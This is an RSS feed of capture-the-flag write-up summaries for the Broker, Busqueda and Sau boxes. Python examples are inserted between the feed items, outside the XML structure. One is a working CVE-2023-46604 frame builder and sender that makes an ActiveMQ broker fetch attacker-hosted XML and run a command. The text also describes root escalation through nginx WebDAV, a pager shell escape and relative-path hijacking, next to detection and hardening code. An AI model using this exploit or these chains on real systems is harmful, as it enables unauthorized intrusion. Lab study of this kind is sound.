<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Rce on appl3b0y</title>
    <link>https://appl3b0y.com/tags/rce/</link>
    <description>Recent content in Rce on appl3b0y</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 04 Jun 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://appl3b0y.com/tags/rce/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Broker</title>
      <link>https://appl3b0y.com/writeups/broker/</link>
      <pubDate>Thu, 04 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/broker/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Broker&lt;/strong&gt; is an easy Linux box built around a single, very topical vulnerability: &lt;strong&gt;CVE-2023-46604&lt;/strong&gt;, the Apache ActiveMQ OpenWire remote code execution bug that made a lot of noise in late 2023. It is a clean, two-step machine: get RCE on the message broker, then abuse one over-permissive &lt;code&gt;sudo&lt;/code&gt; rule to become root.&lt;/p&gt;&#xA;&lt;p&gt;The foothold is almost handed to us. The ActiveMQ web console still accepts the default &lt;code&gt;admin:admin&lt;/code&gt; credentials, which is enough to read the exact version (5.15.15) and confirm it is vulnerable: the fix only shipped in 5.15.16, 5.16.7, 5.17.6 and 5.18.3. From there, the OpenWire protocol on &lt;strong&gt;61616&lt;/strong&gt; does the rest. When the broker unmarshals an &lt;code&gt;ExceptionResponse&lt;/code&gt; it loads whatever class name the frame carries, calls its one-argument String constructor with the message from the frame, and only then casts the result to &lt;code&gt;Throwable&lt;/code&gt;. Naming Spring&amp;rsquo;s &lt;code&gt;ClassPathXmlApplicationContext&lt;/code&gt; with a URL we host makes the broker fetch our Spring XML and instantiate the bean it declares (a &lt;code&gt;ProcessBuilder&lt;/code&gt; with our command), which returns a shell as the &lt;code&gt;activemq&lt;/code&gt; user. Privesc is a textbook GTFOBins move: &lt;code&gt;activemq&lt;/code&gt; can run &lt;code&gt;nginx&lt;/code&gt; under &lt;code&gt;sudo&lt;/code&gt;, and &lt;code&gt;nginx -c&lt;/code&gt; takes its whole configuration from a file we choose, so we start an instance whose workers run as root with WebDAV &lt;code&gt;PUT&lt;/code&gt; enabled and simply write our SSH key into &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt;.&lt;/p&gt;</description>
    </item>
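The trigger frame summarised in the Broker introduction above, as an added example that is not code from the write-up or from ActiveMQ. It encodes the OpenWire ExceptionResponse that exploits CVE-2023-46604, decodes one back the way the broker's marshaller reads it, and adds a crude detection heuristic for captured port 61616 traffic. The hosted XML is assumed to declare a java.lang.ProcessBuilder bean whose constructor-arg list holds the command and whose init-method is start, as in the public proofs of concept; the lab addresses 10.10.11.243 and 10.10.14.5:8000/poc.xml and the send_trigger helper are assumptions.

```python
"""Build and decode the OpenWire frame that triggers CVE-2023-46604.

Added example, not code from the write-up or from ActiveMQ. A fresh TCP
connection to the broker uses loose OpenWire encoding until a WireFormatInfo
exchange says otherwise, so the frame is just: 4-byte big-endian size, 1-byte
command type (0x1f = ExceptionResponse), BaseCommand fields (commandId,
responseRequired), Response.correlationId, then the Throwable as a presence
flag plus two length-prefixed UTF strings (class name, message). The broker
calls Class.forName(className) and its String constructor with the message
*before* casting to Throwable, so a Spring ClassPathXmlApplicationContext
fetches the URL carried in the message.
"""
import socket
import struct

EXCEPTION_RESPONSE = 0x1F
GADGET_CLASS = "org.springframework.context.support.ClassPathXmlApplicationContext"


def _loose_string(s: str) -> bytes:
    """Loose-encoded nullable string: presence flag + DataOutputStream.writeUTF()."""
    data = s.encode("utf-8")
    if len(data) > 0xFFFF:
        raise ValueError("writeUTF strings are limited to 65535 bytes")
    return b"\x01" + struct.pack(">H", len(data)) + data


def build_exception_response(class_name: str, message: str,
                             command_id: int = 0, correlation_id: int = 0) -> bytes:
    """Encode an ExceptionResponse whose Throwable is (class_name, message)."""
    body = bytes([EXCEPTION_RESPONSE])
    body += struct.pack(">I", command_id)      # BaseCommand.commandId
    body += b"\x00"                            # BaseCommand.responseRequired = false
    body += struct.pack(">I", correlation_id)  # Response.correlationId
    body += b"\x01"                            # ExceptionResponse.exception is present
    body += _loose_string(class_name)          # Throwable class name
    body += _loose_string(message)             # Throwable message
    return struct.pack(">I", len(body)) + body


def build_trigger(xml_url: str) -> bytes:
    """The CVE-2023-46604 frame: the gadget class with our XML URL as its 'message'."""
    return build_exception_response(GADGET_CLASS, xml_url)


def _read_loose_string(buf: bytes, off: int):
    if buf[off] == 0:
        return None, off + 1
    (n,) = struct.unpack(">H", buf[off + 1:off + 3])
    start = off + 3
    return buf[start:start + n].decode("utf-8"), start + n


def decode_frame(frame: bytes) -> dict:
    """Parse a frame the way ExceptionResponseMarshaller.looseUnmarshal would."""
    (size,) = struct.unpack(">I", frame[:4])
    body = frame[4:]
    if size != len(body):
        raise ValueError("size prefix does not match frame length")
    if body[0] != EXCEPTION_RESPONSE:
        raise ValueError("not an ExceptionResponse frame")
    (command_id,) = struct.unpack(">I", body[1:5])
    (correlation_id,) = struct.unpack(">I", body[6:10])
    out = {"command_id": command_id, "response_required": body[5] != 0,
           "correlation_id": correlation_id, "exception_class": None, "message": None}
    if body[10] != 0:
        out["exception_class"], off = _read_loose_string(body, 11)
        out["message"], _ = _read_loose_string(body, off)
    return out


def is_suspicious(decoded: dict) -> bool:
    """Crude detection heuristic for captured 61616 traffic. Assumption: a genuine
    Throwable class name ends in Exception/Error/Throwable and never carries a URL."""
    clazz = decoded.get("exception_class") or ""
    message = decoded.get("message") or ""
    throwable_like = clazz.endswith(("Exception", "Error", "Throwable"))
    carries_url = message.startswith(("http://", "https://", "file:", "ftp://"))
    return (not throwable_like) or carries_url


def send_trigger(host: str, port: int, xml_url: str, timeout: float = 5.0) -> int:
    """Deliver the frame to the broker; returns the number of bytes written."""
    frame = build_trigger(xml_url)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(frame)
    return len(frame)


if __name__ == "__main__":
    # Assumed lab addresses: broker at 10.10.11.243:61616, our XML served from 10.10.14.5:8000.
    print(decode_frame(build_trigger("http://10.10.14.5:8000/poc.xml")))
    # send_trigger("10.10.11.243", 61616, "http://10.10.14.5:8000/poc.xml")
```

Run the module to see the decoded frame; uncomment the send_trigger line only against a box you are authorised to test. The decoder doubles as a quick check for a packet capture: any ExceptionResponse whose class name is not a Throwable, or whose message is a URL, is the exploit.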
    <item>
      <title>Busqueda</title>
      <link>https://appl3b0y.com/writeups/busqueda/</link>
      <pubDate>Tue, 02 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/busqueda/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Busqueda&lt;/strong&gt; is an easy Linux box that plays out like a small, realistic engagement: one web bug for the foothold, then a chain of information leaks and a &lt;code&gt;sudo&lt;/code&gt; misconfiguration for root. No memory corruption, just reading things carefully.&lt;/p&gt;&#xA;&lt;p&gt;The foothold is an &lt;strong&gt;&lt;code&gt;eval()&lt;/code&gt; injection&lt;/strong&gt; in &lt;strong&gt;Searchor 2.4.0&lt;/strong&gt;, the library powering the search site: the query we submit is formatted straight into a Python expression that the library hands to &lt;code&gt;eval()&lt;/code&gt;, so closing the string early lets us append a call of our own. That gives a shell as &lt;code&gt;svc&lt;/code&gt;. From there the box is about looting: a leftover &lt;code&gt;.git/config&lt;/code&gt; exposes a Gitea instance and a set of credentials in its remote URL, and a &lt;code&gt;sudo&lt;/code&gt;-runnable &amp;ldquo;system checkup&amp;rdquo; script lets us inspect Docker containers, one of which leaks a database password in its environment. That password is &lt;strong&gt;reused&lt;/strong&gt; for the Gitea admin, which lets us read the source of the very script we can run as root. The script calls a helper by a &lt;strong&gt;relative path&lt;/strong&gt;, and &lt;code&gt;sudo&lt;/code&gt; keeps the working directory we invoke it from, so we drop our own executable of that name in a directory we control, run the script from there, and it executes ours as root.&lt;/p&gt;</description>
    </item>
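The relative-path mistake from the Busqueda introduction above, as an added example beside a hardened version; this is not the box's own checkup script, and the helper name full-checkup.sh and the directories are placeholders. The demo builds two throwaway directories, shows that the vulnerable call runs whatever the caller planted in its working directory, and that the hardened call resolves the helper against a fixed directory and refuses a copy that group or others can write.

```python
"""A sudo-run script that calls its helper by a relative path, beside a hardened version.

Added example, not the box's own 'system checkup' script; the helper name and the
directories are placeholders. The bug: subprocess resolves './full-checkup.sh'
against the process cwd, and sudo keeps the caller's cwd by default, so whoever
runs the script chooses which file runs as root.
"""
import os
import stat
import subprocess
import tempfile

HELPER_NAME = "full-checkup.sh"  # placeholder name for the helper script


def run_helper_vulnerable(cwd: str) -> str:
    """Mirror of the write-up's mistake: a relative path resolved from the caller's cwd."""
    proc = subprocess.run(["./" + HELPER_NAME], cwd=cwd,
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def run_helper_hardened(trusted_dir: str, cwd: str) -> str:
    """Resolve the helper against a fixed directory and refuse it if others can edit it.

    cwd is still handed to the child only so the demo can show it no longer matters.
    Owner must be root (or, so this demo can run unprivileged, the current user).
    """
    path = os.path.join(os.path.realpath(trusted_dir), HELPER_NAME)
    st = os.stat(path)                     # FileNotFoundError rather than a fallback search
    if st.st_uid not in (0, os.geteuid()):
        raise PermissionError("helper is owned by an untrusted user: " + path)
    mode = stat.filemode(st.st_mode)       # e.g. '-rwxr-xr-x'; index 5 = group w, 8 = other w
    if mode[5] == "w" or mode[8] == "w":
        raise PermissionError("helper is writable by group or others: " + path)
    proc = subprocess.run([path], cwd=cwd, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def _write_script(path: str, command: str, mode: int = 0o700) -> None:
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + command + "\n")
    os.chmod(path, mode)


def demo() -> dict:
    """Constructed scenario: an attacker-controlled cwd and a root-managed directory."""
    with tempfile.TemporaryDirectory() as attacker_dir, tempfile.TemporaryDirectory() as trusted_dir:
        _write_script(os.path.join(attacker_dir, HELPER_NAME), "echo hijacked")
        _write_script(os.path.join(trusted_dir, HELPER_NAME), "echo legitimate")
        result = {
            "vulnerable": run_helper_vulnerable(attacker_dir),
            "hardened": run_helper_hardened(trusted_dir, cwd=attacker_dir),
        }
        # A root-owned helper that anyone can edit is just the same bug in another place.
        os.chmod(os.path.join(trusted_dir, HELPER_NAME), 0o777)
        try:
            run_helper_hardened(trusted_dir, cwd=attacker_dir)
            result["refuses_world_writable"] = False
        except PermissionError:
            result["refuses_world_writable"] = True
        return result


if __name__ == "__main__":
    print(demo())
```

The same check belongs on every file a privileged script opens or executes; an absolute path alone is not enough if the directory it points into is writable by the low-privilege user.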
    <item>
      <title>Sau</title>
      <link>https://appl3b0y.com/writeups/sau/</link>
      <pubDate>Tue, 02 Jun 2026 00:00:00 +0000</pubDate>
      <guid>https://appl3b0y.com/writeups/sau/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;&lt;strong&gt;Sau&lt;/strong&gt; is an easy Linux box, and it is a very clean example of chaining three small, well-scoped bugs into root. Nothing here needs a custom exploit or memory corruption; each stage is &amp;ldquo;known software at a known vulnerable version&amp;rdquo;.&lt;/p&gt;&#xA;&lt;p&gt;The chain: the only web app we can reach is &lt;strong&gt;Request Baskets 1.2.1&lt;/strong&gt;, which has an &lt;strong&gt;SSRF&lt;/strong&gt; (CVE-2023-27163): a basket can be configured to forward every request it receives to an arbitrary URL, including one on the host itself. We use that to reach, from the inside, a port that nmap reported as &lt;code&gt;filtered&lt;/code&gt; because a firewall rule blocks it from outside. Behind that port sits &lt;strong&gt;Maltrail v0.53&lt;/strong&gt;, which has a trivial &lt;strong&gt;unauthenticated command injection&lt;/strong&gt; in its login page, giving us a shell as &lt;code&gt;puma&lt;/code&gt;. Finally, &lt;code&gt;puma&lt;/code&gt; is allowed to run &lt;code&gt;systemctl status&lt;/code&gt; for one service under &lt;code&gt;sudo&lt;/code&gt;. When stdout is a terminal and the output does not fit on one screen, &lt;code&gt;systemctl&lt;/code&gt; pipes it through the &lt;code&gt;less&lt;/code&gt; pager, which runs as root and honours shell escapes, so a single &lt;code&gt;!sh&lt;/code&gt; drops us into a root shell (shrink the terminal first if the status output is too short to trigger paging). The defensive lesson is the usual one: a &lt;code&gt;sudo&lt;/code&gt; rule that allows a pager-spawning command is a root shell, so pin the exact argument list (here with &lt;code&gt;--no-pager&lt;/code&gt;) or drop the rule.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
